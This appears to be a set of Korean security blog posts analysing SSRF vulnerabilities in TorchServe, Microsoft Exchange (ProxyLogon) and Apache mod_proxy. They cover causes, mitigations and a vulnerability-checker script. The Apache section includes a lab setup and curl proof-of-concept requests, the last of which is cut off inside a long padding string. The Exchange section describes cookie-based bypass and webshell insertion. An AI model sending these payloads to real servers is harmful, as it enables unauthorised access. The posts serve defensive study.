1. TorchServe

- Meta와 AWS에서 개발한 파이토치(PyTorch) 머신러닝 라이브러리를 기반으로 하는 새로운 모델 서비스 프레임워크 [1]

- 파이토치(PyTorch) 란 딥러닝 구현을 위한 파이썬 기반의 오픈소스 머신러닝 라이브러리 [2]

- PyTorch 생태계의 인기 있는 오픈 소스 패키지

 

2. 취약점

[사진 1] https://nvd.nist.gov/vuln/detail/CVE-2023-43654 [3]

- TorchServer의 기본 설정 사용 시 부적절한 입력 값 검증으로인해 발생하는 SSRF 취약점 (CVSS: 9.8)

- 공격자는 해당 취약점을 이용해 TorchServe에 악성 모델을 업로드하여 임의 코드를 실행할 수 있음

영향받는 버전
- TorchServe 0.3.0 ~ 0.8.1 버전

 

2.1 취약점 상세 [4]

- TorchServe의 안내에 따르면, 인증되지 않은 접근을 방지 하기위해 기본적으로 localhost에서만 접근이 가능

 

구분 설명
inference_address 추론 API 바인딩 주소, 포트번호 8080
management_address 관리 API 바인딩 주소, 포트번호 8081
metrics_address 메트릭 API 바인딩 주소, 포트번호 8082
specific IP 특정 IP와 Port로부터 모델에서 실행할 경우 지정

 

[사진 2] 취약점 발생 위치

 

- 실제 인터페이스는 기본적으로 0.0.0.0에 바인딩 되어 있으며, 사용자 인증 과정이 부재

> IP 0.0.0.0모든 주소를 의미하기 때문에, 모든 IP에서 접근이 가능함을 의미 [6][7]

> 또한, 인증 과정이 없어 공격자가 서버에 접근하여 악성 모델 업로드 및 임의 코드가 실행할 수 있음

inference_address=hxxp://0.0.0.0:8080
management_address=hxxp://0.0.0.0:8081
metrics_address=hxxp://0.0.0.0:8082

 

[영상 1] 전체 Exploit 과정 요약

 

2.2 CVE-2022-1471 [8][9]

- CVE-2023-43654 외에 해당 취약점에도 영향 받는 것으로 확인됨

> SnakeYaml 2.0 이전 버전의 Constructor() 클래스는 역직렬화 중 인스턴스화될 수 있는 유형을 제한하지 않아 악성 Yaml 콘텐츠를 역직렬화 하여 원격 코드를 실행하는 취약점

 

3. 대응방안

① 벤더사에서 제공하는 최신 업데이트 적용 [10]

구분 취약한 버전 해결 버전
TorchServe 0.3.0 ~ 0.8.1 버전 0.8.2 버전

 

② 기본 설정 변경

- 해당 취약점은 기본 설정을 그대로 사용해 발생하는 취약점

> 따라서, 기본 설정을 내부 환경에 맞게 적절한 변경이 필요

- 최신 패치 버전(0.8.2)에서는 기본 설정을 사용할 경우 사용자에게 경고 알림을 발생시키는 것으로 확인됨.

 

③ config.properties 파일 수정

- 신뢰할 수 있는 도메인에서만 모델을 가져올 수 있도록 config.properties 파일 수정

<예시>
allowed_urls=https://s3.amazonaws.com/.*,https://torchserve.pytorch.org/.*

 

④ 점검 툴 사용 [11]

- 취약점을 발견한 보안 업체에서 해당 취약점에 영향을 받는지 확인할 수 있는 점검 툴 제공

response=$(curl --max-time 10 -s -X POST http://$TORCHSERVE_IP:$TORCHSERVE_PORT/workflows\?url\=$REMOTE_SERVER/$SSRF_DOWNLOAD_FILE_NAME)
response=$(echo "$response" | tr -d '[:space:]')
echo -e "${COLOR_WHITE_FORMAT}Checking CVE-2023-43654 Remote Server-Side Request Forgery (SSRF)"

# If no response at all
if [ -z "$response" ]; then
  echo -e "${COLOR_YELLOW_FORMAT}Cannot check CVE-2023-43654 Failed to send request to http://$TORCHSERVE_IP:$TORCHSERVE_PORT"

# Check response
else
  if [[ "$response" == "$SSRF_RESPONSE_EXISTS" ]]; then
    echo -e "${COLOR_YELLOW_FORMAT}The test file already exists in the server.To test again remove the file <torchserve_path>model-server/model-store/$SSRF_DOWNLOAD_FILE_NAME and run the script."
    HAS_SSRF=true
  elif [[ "$response" == "$SSRF_RESPONSE" ]]; then
    HAS_SSRF=true
    echo -e "${COLOR_RED_FORMAT}Vulnerable to CVE-2023-43654 SSRF file download"
  elif [[ "$response" == "$SSRF_NOT_VULNERABLE_RESPONSE" ]]; then
    HAS_SSRF=false
    echo -e "${COLOR_GREEN_FORMAT}Not Vulnerable to CVE-2023-43654 SSRF file download"
  else
    HAS_SSRF=true
    echo -e "${COLOR_YELLOW_FORMAT}Could not determine if TorchServe is vulnerable to CVE-2023-43654"
  fi
fi

 

4. 참고

[1] https://www.aitimes.kr/news/articleView.html?idxno=16158
[2] https://blog.naver.com/os2dr/221565409684
[3] https://nvd.nist.gov/vuln/detail/CVE-2023-43654
[4] https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654
[5] https://pytorch.org/serve/configuration.html?highlight=configure+torchserve+listening
[6] https://inpa.tistory.com/entry/WEB-%F0%9F%8C%90-00000-%EB%9E%80-%EB%AC%B4%EC%97%87%EC%9D%B8%EA%B0%80
[7] https://mamu2830.blogspot.com/2022/10/what-is-0.0.0.0%20.html
[8] https://nvd.nist.gov/vuln/detail/CVE-2022-1471
[9] https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2
[10] https://aws.amazon.com/ko/security/security-bulletins/AWS-2023-009/
[11] https://github.com/OligoCyberSecurity/ShellTorchChecker
[12] https://www.securityweek.com/critical-torchserve-flaws-could-expose-ai-infrastructure-of-major-companies/
[13] https://www.boannews.com/media/view.asp?idx=122377&kind=1&search=title&find=%C0%CE%B0%F8%C1%F6%B4%C9+%C0%CE%C7%C1%B6%F3%BF%A1+%B3%CE%B8%AE+%BB%E7%BF%EB%B5%C7%B4%C2+%BF%C0%C7%C2 

1. MS Window Exchange Serve

- 전자 메일, 연락처, 일정 등의 기능을 제공하는 협업 소프트웨어

 

1.1 Exchange Serve 구조

[사진 1] Exchange Serve 구조 및 취약점 발생 지점

 

- Exchange Serve는 사용자 UI를 담당하는 Front-End와 로직을 담당하는 Back-End로 구성

- Front-End로 들어온 사용자 요청은 내부 처리 과정을 거쳐 1:1로 연결된 Back-End의 모듈로 전송

> 각 요청마다 처리하는 모듈이 다르며 각 모듈은 동일한 하나의 모듈을 상속받아 특성에 맞게 추가 구현됨

 

2. 취약점 [2]

[사진 2] https://nvd.nist.gov/vuln/detail/CVE-2021-26855 [1]

 

- Exchange 서버에서 입력값 검증이 미흡하여 발생하는 SSRF 취약점으로 Exchange 서버로 인증이 가능

> 영향받는 버전: Microsoft Exchange Server 2013, 2016, 2019

> 공격자는 해당 공격을 통해 Exchange 서버에 접근할 수 있는 일부 권한 획득추가적인 공격을 진행

CVE 설명
CVE-2021-26857 Exchange 서버에서 안전하지 않은 역직렬화로 인해 발생하는 임의코드실행 취약점
CVE-2021-27065 Exchange 서버에서 발생하는 임의파일쓰기 취약점
CVE-2021-26858

[사진 3] 취약점 악용 과정 요약 [3]

2.1 CVE-2021-26855

- Front-End로 들어온 사용자의 요청을 Back-End로 전달 하기위해 ProxyRequestHandler 모듈을 사용 [4]

사용자 접속 페이지 사용자 요청 처리 모듈 최상위 모듈
/owa OwaProxyRequestHandler ProxyRequestHandler
/ews EwsProxyRequestHandler
/ecp EcpProxyRequestHandler

 

- ProxyRequestHandler.GetTargetBackEndServerUrl() 메서드
> urlAnchorMailbox의 값이 Null일 경우 Back-End의 Host 값을 this.AnchoredRoutingTarget.BackEndServer.Fqdn에서 가져옴

protected virtual Uri GetTargetBackEndServerUrl() {
    this.LogElapsedTime("E_TargetBEUrl");
    Uri result;
    try {
        UrlAnchorMailbox urlAnchorMailbox = this.AnchoredRoutingTarget.AnchorMailbox as UrlAnchorMailbox;
        if (urlAnchorMailbox != null) {
            result = urlAnchorMailbox.Url;
        } else {
            UriBuilder clientUrlForProxy = this.GetClientUrlForProxy();
            clientUrlForProxy.Scheme = Uri.UriSchemeHttps;
            clientUrlForProxy.Host = this.AnchoredRoutingTarget.BackEndServer.Fqdn;
            clientUrlForProxy.Port = 444;
            if (this.AnchoredRoutingTarget.BackEndServer.Version < Server.E15MinVersion) {
                this.ProxyToDownLevel = true;
                RequestDetailsLoggerBase<RequestDetailsLogger>.SafeAppendGenericInfo(this.Logger, "ProxyToDownLevel", true);
                clientUrlForProxy.Port = 443;
            }
            result = clientUrlForProxy.Uri;
        }
    }
    finally {
        this.LogElapsedTime("L_TargetBEUrl");
    }
    return result;
}

 

- /owa에서 사용자 요청이 올 경우 this.AnchoredRoutingTarget.BackEndServer 값BEResourceRequestHandler 모듈의 ResolveAnchorMailbox() 메소드를 통해 결정

> 이때, 사용자 요청에서 "X-AnonResource-Backend" 쿠키의 값을 필터링 없이 그대로 사용

> 따라서, 공격자는 해당 헤더를 접근 불가능한 내부 사이트 또는 다른 서버로 조작하여 접근이 가능하게 됨

protected override AnchorMailbox ResolveAnchorMailbox() {
    HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
    if (httpCookie != null) {
        this.savedBackendServer = httpCookie.Value;
    }
    if (!string.IsNullOrEmpty(this.savedBackendServer)) {
        base.Logger.Set(3, "X-AnonResource-Backend-Cookie");
        if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
            ExTraceGlobals.VerboseTracer.TraceDebug<HttpCookie, int>((long)this.GetHashCode(), "[OwaResourceProxyRequestHandler::ResolveAnchorMailbox]: AnonResourceBackend cookie used: {0}; context {1}.", httpCookie, base.TraceContext);
        }
        return new ServerInfoAnchorMailbox(BackEndServer.FromString(this.savedBackendServer), this);
    }
    return new AnonymousAnchorMailbox(this);
}

 

/ecp에서 사용자 요청이 올 경우 this.AnchoredRoutingTarget.BackEndServer 값 BEResourceRequestHandler 모듈의 ResolveAnchorMailbox() 메소드를 통해 결정
> 이때, 사용자 요청에서 "X-BEResource" 쿠키의 값을 필터링 없이 그대로 사용
> 공격자는 해당 쿠키를 조작하여 내부 서버에서 계정 정보를 획득 및 악용하여 인증을 우회할 수 있음

 

2.2 CVE-2021-26857 [5]

- Exchange 서버에서 안전하지 않은 역직렬화로 인해 발생하는 임의코드실행 취약점

> 메일 서버 침투 후 해당 취약점을 이용해 관리자 권한을 획득하여 시스템을 장악

 

2.3 CVE-2021-27065 [6]

- Exchange 서버에서 발생하는 임의파일쓰기 취약점

> 메일 서버 침투 후 OAB(Offline Address Book) 설정 파일에 한줄 웹쉘을 삽입(=재설정)실행 명령을 포함한 요청을 전송웹쉘 실행

> OAB를 재설정하는 과정에서 경로 및 확장자를 검토하는 코드가 없어 공격자가 원하는 위치에 원하는 확장자로 파일 생성 가능 [4]

※ OAB : MS Exchange Server에서 제공하는 주소록 기능으로 Outlook이 Exchange Server와 통신할 때 다운 받게 되는 주소록으로, Exchange server와 통신하지 않는(오프라인) 상황에서 해당 파일을 참조

[사진 4]&nbsp;WriteFileActivity.Run()

2.4 CVE-2021-26858 [7]

- Exchange 서버에서 발생하는 임의파일쓰기 취약점

 

3. 대응방안

① 벤더사에서 제공하는 업데이트 적용 [8][9]

- 특정 쿠키 값 조작 후 접근 불가 사이트 접근 및 인증우회를 방지하기 위한 유효성 검증 코드 추가

- 웹쉘 실행을 방지하기 위해 생성되는 파일의 확장자에 .txt 확장자를 추가하는 코드 추가

 

- KISA 보호나라 보안 공지 참고 업데이트 적용 [10]

> 즉각적인 업데이트가 불가할 경우 KISA 보호나라 임시 조치 방안 참고 [11]

 

② 운영체제 및 사용중인 주요 SW의 보안 업데이트 적용
 불필요한 네트워크 서비스의 경우 중단 또는 기능 삭제
 방화벽 설정 등을 통해 외부에서 들어오는 스캐닝 등 차단
 웹쉘 업로드 여부 모니터링 및 관련 보안 SW 적용
 지속적 접근을 위한 스케줄러 등록 작업 검토
 공개된 공격도구들에 대한 시그니처를 보안장비에 등록하여 차단 또는 탐지하도록 설정
 로그 모니터링
 공개된 침해지표 등을 보안장비에 등록 등

 

4. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2021-26855
[2] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000127&nttId=36053&menuNo=205021
[3] https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
[4] https://chmodi.tistory.com/154
[5] https://nvd.nist.gov/vuln/detail/cve-2021-26857
[6] https://nvd.nist.gov/vuln/detail/CVE-2021-27065
[7] https://nvd.nist.gov/vuln/detail/CVE-2021-26858
[8] https://msrc.microsoft.com/blog/2021/03/multiple-security-updates-released-for-exchange-server/
[9] https://chmodi.tistory.com/157
[10] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=35929&menuNo=205020
[11] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=35931&menuNo=205020
[12] https://www.boannews.com/media/view.asp?idx=97934
[13] https://www.boannews.com/media/view.asp?idx=106528

1. Apache HTTP Server

- 아파치 소프트웨어 재단에서 관리하는 오픈 소스, 크로스 플랫폼 HTTP 웹 서버 소프트웨어

 

1.1 mod_proxy

- Apache HTTP Server의 선택적 모듈

- 다중 프로토콜 프록시/게이트웨이 서버

 

mod_proxy - Apache HTTP Server Version 2.4

Apache Module mod_proxy Summary Warning Do not enable proxying with ProxyRequests until you have secured your server. Open proxy servers are dangerous both to your network and to the Internet at large. mod_proxy and related modules implement a proxy/gatewa

httpd.apache.org

 

2. 취약점

[사진 1] https://nvd.nist.gov/vuln/detail/CVE-2021-40438

- 인증되지 않은 사용자가 Mod_Proxy 모듈을 통해 SSRF 공격 가능

① 전제조건
- mod_proxy 구성 사용.
- VirtualHost의 ProxyPass가 지정한 URL 항목을 알아야 함.
- GET 방식을 사용하여 매우 긴 문자열을 요청하여 대상 Apache 설정을 초과

② 영향받는 조건
- Apache HTTP Server 2.4.48 이전 버전

 

2.1 실습

- docker 빌드 및 실행

git clone https://github.com/sixpacksecurity/CVE-2021-40438
cd CVE-2021-40438
docker build -t cve-2021-40438:1.0 .
docker run --rm -d -p 4444:80 cve-2021-40438:1.0

[사진 2] docker 프로세스 확인

 

- curl PoC 수행 및 결과 301 응답값과 함께 google.com으로 리다이렉트

curl "http://[Dst IP]:4444/?unix|http://google.com/"

[사진 3] curl 결과

 

- URL 직접 접근 시 마찬가지로 google.com으로 리다이렉트

[사진 4] URL 접근(위) 및 리다이텍트(아래)

 

- 위 패킷을 와이어 샤크로 확인해보면 [사진 5]와 같음

[사진 5] 와이어샤크 확인

2.2 분석

- 해당 취약점은 URI 검증 중 proxy_util.c의 "fix_uds_filename()" 함수에서 발생

- 해당 함수는 mod_proxy 내에서 UDS(Unix Domain Socket) 리디렉션을 결정하는 함수로 판단됨.

- 일반적으로 "unix:" 문자열을 URI 어딘가에 위치시킴으로써 리다이렉션에 사용할 실제 URI를 추출

- 이러한 URI는 Apache 내부적으로 생성되어야 하지만, 임의 도메인 소켓에 대한 접근이 가능함으로 인해 SSRF 취약점이 발생

[사진 6] 취약점 발생 위치

 

- 추가적으로, 공격을 위한 코드가 긴 이유는 길이 검증 연산인 APR_PATH_MAX에서 오류를 반환하기 위함.

[사진 7] APR_PATH_MAX

 

- 길이 검증에서 발생한 오류는 ap_runtime_dir_relative()에서 NULL을 반환

ap_runtime_dir_relative()는 [사진 6]의 fix_uds_filename()에 의해 호출되며, 반환된 값에 대한 추가 검증이 없음.

- 반환된 NULL 값은 공격자가 요청한 임의 URL로 덮어 쓰게 되는 것으로 판단됨. 즉, 오류를 통해 우회가 가능 

[사진 8] ap_runtime_dir_relative() 호출

 

2.3 PoC

- PoC의 구성은 다음과 같음

① source (취약한 서버)에 unix 매개변수의 값을 다수의 A로 덮어씀

② 2.2 분석에서 확인된 취약점과 오류를 통해 공격 대상 서버 (victim)로 요청이 리다이렉트 됨

curl "https://source/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA